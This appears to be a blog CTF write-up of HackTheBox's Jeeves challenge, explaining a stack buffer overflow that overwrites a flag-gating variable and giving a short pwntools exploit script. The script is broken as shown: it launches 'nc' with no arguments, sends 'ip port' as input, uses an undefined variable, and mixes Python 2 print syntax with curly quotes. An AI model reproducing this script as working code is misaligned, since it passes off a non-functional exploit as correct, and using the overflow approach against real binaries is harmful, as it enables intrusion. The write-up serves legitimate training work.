We covered a scenario of a binary vulnerable to buffer overflow vulnerability. The binary has NX and PIE protections enabled so we opened the binary with Ghidra debugger and built the exploitation methodology based on calculating the offsets of the input variable and another variable that controls an entry to an if statement that prints the flag. The objective was to control the value of that binary and let the execution flow enter the if statement. This was part of HackTheBox Jeeves Intro to Binary Exploitation Track.

Exploit Code is below

##Beginning

from pwn import *

target = process(“nc”)

target.sendline(“ip port”)

payload = “A”*60

byte_to_string = p64(value)

payload = payload + byte_to_string.decode(“ISO-8859-1”)

target.sendline(payload)

print target.recvuntil(“.”)

##Ending

Video Walkthrough

Binary Exploitation, Buffer Overflow, CTF Writeups, HackTheBox, HackTheBox Intro to Binary Exploitation, HackTheBox Jeeves

Show Comments

Motasem

About the Author

I create cybersecurity notes, digital marketing notes and online courses. I also provide digital marketing consulting including but not limited to SEO, Google & Meta ads and CRM administration.

View Articles

Buffer Overflow | Intro to Binary Exploitation | HackTheBox Jeeves

Leave a Reply Cancel reply

Motasem

About the Author

Other stories

PHP Session Hijacking With XOR Encrypion | OverTheWire War Games Natas Level 11

Introduction To Digital Forensics | TryHackMe Intro to Cyber Security

Press ESC to close

Buffer Overflow | Intro to Binary Exploitation | HackTheBox Jeeves

Leave a Reply Cancel reply

Motasem

About the Author

Share Article:

Other stories

PHP Session Hijacking With XOR Encrypion | OverTheWire War Games Natas Level 11

Introduction To Digital Forensics | TryHackMe Intro to Cyber Security